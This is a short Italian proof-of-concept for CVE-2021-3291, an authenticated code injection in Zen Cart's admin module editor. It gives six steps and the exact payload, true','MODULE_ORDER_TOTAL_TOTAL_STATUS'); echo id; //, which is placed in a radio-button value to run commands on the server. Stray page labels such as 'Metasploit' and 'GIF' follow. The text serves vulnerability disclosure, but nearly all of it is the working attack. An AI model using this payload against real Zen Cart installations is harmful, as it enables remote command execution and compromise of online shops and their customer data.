
Exploit per esecuzione remota di codice autenticata su Zen Cart tramite SQL injection nella modifica dei moduli di amministrazione. Proof-of-concept per CVE-2021-3291.
1-) accedi come amministratore
2-) apri la pagina di modifica di qualsiasi modulo
3-) ispeziona l'elemento di qualsiasi radiobox true
4-) cambia true in true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo id; //
5-) clicca su aggiorna
6-) per attivare il comando vai di nuovo alla pagina di modifica
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
exploit
aggiorna la pagina
zoom

Metasploit

GIF
